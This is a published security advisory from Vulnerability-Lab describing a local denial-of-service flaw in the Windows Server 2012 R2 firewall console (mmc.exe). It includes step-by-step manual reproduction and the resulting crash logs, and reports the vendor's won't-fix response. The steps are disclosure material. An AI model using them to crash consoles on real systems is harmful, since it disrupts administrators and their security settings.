Microsoft Windows 2012 R2 x64 - (MMC) DoS Vulnerability

Document Title:
===============
Microsoft Windows 2012 R2 x64 - (MMC) DoS Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2235

MSRC ID: 58288

Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2020/04/29/microsoft-windows-2012-r2-x64-mmc-local-dos-vulnerability


Release Date:
=============
2020-04-28


Vulnerability Laboratory ID (VL-ID):
====================================
2235


Common Vulnerability Scoring System:
====================================
5.2


Vulnerability Class:
====================
Denial of Service


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Microsoft Windows Server 2012, working title Microsoft Windows Server 8, is an operating system of the Windows series from 
the software manufacturer Microsoft and the successor product of Windows Server 2008 R2. It is the server version of 
Windows 8 and was released on September 4, 2012, the further development Windows Server 2012 R2 in October 2013. 
The support of Windows Server 2012 R2 and thus the delivery of security updates ends on October 10, 2023.


(Copy of the Homepage:  https://de.wikipedia.org/wiki/Microsoft_Windows_Server_2012)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local denial of service vulnerability in the official Microsoft Windows 2012 R2 operating system.


Vulnerability Disclosure Timeline:
==================================
2020-04-26: Researcher Notification & Coordination (Security Researcher)
2020-04-27: Vendor Notification (Security Department)
2020-04-29: Vendor Response/Feedback (Security Department) 
2020-04-29: Vendor Fix/Patch (Won't Fix - OS Support)
2020-04-29: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Local


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (Guest Privileges)


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A local denial of service security vulnerability has been discovered in the official Microsoft Windows 2012 R2 (x64) operating system.
The denial of service vulnerability allows remote attackers to crash or freeze the application, a process or its inbound components.

The windows 2012 r2 has a basic firewall were it is possible to setup specific rule set. Defining a block policy for ips (above 200) 
can result in a corruption of the windows mmc.exe (Microsoft Management Console). The result is that the actual snapshot of the session 
corrupts due to the error with a corruption, which results in a simple but stable application crash. The issue occurs in the kernelbase 
dynamic link library because of the counted ip items in the list that returns with a null pointer. The problemtic comes up through the 
Incoming rules - New Rule (Add) function. The issue can be exploited by local low privileged system user accounts without user interaction. 
The issue only affects only the x64 architecture operating systems with windows 2012 r2. Local attackers are able to crash the mmc.exe which 
results in several local misfunctioning security measures. Triggering the issue results two times in an application hang and in the third 
attempt in a final uncaught exception that crashs the full process. Due to the crash the windows firewall popup with the advanced security 
settings to protect but clicking ok still corrupts the process, then to recover the snapshot.

Successful exploitation of the local vulnerability results in mmc.exe process crashs, snapshot corruptions or missing security function.

Request Method(s):
[+] Local

Vulnerable Module(s):
[+] Firewall - Incoming rules

Vulnerable Function(s):
[+] New Rule (Add) - (Local IP / Remote IP)

DLL(s):
[+] Kernelbase


Proof of Concept (PoC):
=======================
The local denial of service iva pointer corruption can be exploited by local attackers with local low privileged user account and without user interaction.
For security demonstration or to reproduce the local denial of service software vulnerability follow the provided information and steps below.


Manual steps to reproduce the vulnerability ...
1. Open the local firewall
2. Setup a new rule
3. Setup to deny all
4. Include some ips above the mentioned limit (200)
5. Save and reply internal by creating afterward a local snapshot (automated)
6. An apphangs occurs 2 times to the process and finally on third time crashs with uncaught null pointer exception
Note: At that point several messages in windows popup to recover the snapshot which results in another error
7. Press ok and the mmc.exe process crashs permanently
8. Successful reproduce of the local vulnerability!


--- Application Error Logs ---
EventType=AppHangTransient
EventTime=132277138943110905
ReportType=3
Consent=1
ReportIdentifier=a43305c3-5d4e-11ea-813c-0025904667c6
IntegratorReportIdentifier=a43305c4-5d4e-11ea-813c-0025904667c6
NsAppName=mmc.exe
Response.type=4
Sig[0].Name=Problemsignatur 01
Sig[0].Value=mmc.exe
Sig[1].Name=Problemsignatur 02
Sig[1].Value=6.3.9600.18910
Sig[2].Name=Problemsignatur 03
Sig[2].Value=5a57a503
Sig[3].Name=Problemsignatur 04
Sig[3].Value=unknown
Sig[4].Name=Problemsignatur 05
Sig[4].Value=unknown
Sig[5].Name=Problemsignatur 06
Sig[5].Value=unknown
Sig[6].Name=Problemsignatur 07
Sig[6].Value=unknown
DynamicSig[1].Name=Betriebsystemversion
DynamicSig[1].Value=6.3.9600.2.0.0.272.7
DynamicSig[2].Name=Gebietsschema-ID
DynamicSig[2].Value=1031
DynamicSig[22].Name=Zusätzliche Absturzsignatur 1
DynamicSig[22].Value=a170a78f269a790e02a336f2ab0610cd
DynamicSig[23].Name=Zusätzliche Absturzsignatur 2
DynamicSig[23].Value=0e01
DynamicSig[24].Name=Zusätzliche Absturzsignatur 3
DynamicSig[24].Value=0e01d9273132497b58cc3792f8af657a
DynamicSig[25].Name=Zusätzliche Absturzsignatur 4
DynamicSig[25].Value=4eb3
DynamicSig[26].Name=Zusätzliche Absturzsignatur 5
DynamicSig[26].Value=4eb3372730c134255f47918244aa9d46
DynamicSig[27].Name=Zusätzliche Absturzsignatur 6
DynamicSig[27].Value=a3b5
DynamicSig[28].Name=Zusätzliche Absturzsignatur 7
DynamicSig[28].Value=a3b5abeb685bc26ab46653aa60185a6e
... 3 time
EventType=APPCRASH
EventTime=132277153626144152
ReportType=2
Consent=1
ReportIdentifier=0f6ea181-5d52-11ea-813c-0025904667c6
IntegratorReportIdentifier=0f6ea180-5d52-11ea-813c-0025904667c6
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=mmc.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=6.3.9600.18910
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=5a57a503
Sig[3].Name=Fehlermodulname
Sig[3].Value=KERNELBASE.dll
Sig[4].Name=Fehlermodulversion
Sig[4].Value=6.3.9600.19425
Sig[5].Name=Fehlermodulzeitstempel
Sig[5].Value=5d26b6e9
Sig[6].Name=Ausnahmecode
Sig[6].Value=00000000
Sig[7].Name=Ausnahmeoffset
Sig[7].Value=000000000000908c


Screenshots: 
https://ibb.co/CbThqJs
https://ibb.co/qNcPLhm


Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab 
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits 
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or 
edit our material contact (admin@ or research@) to get a ask permission.

				    Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™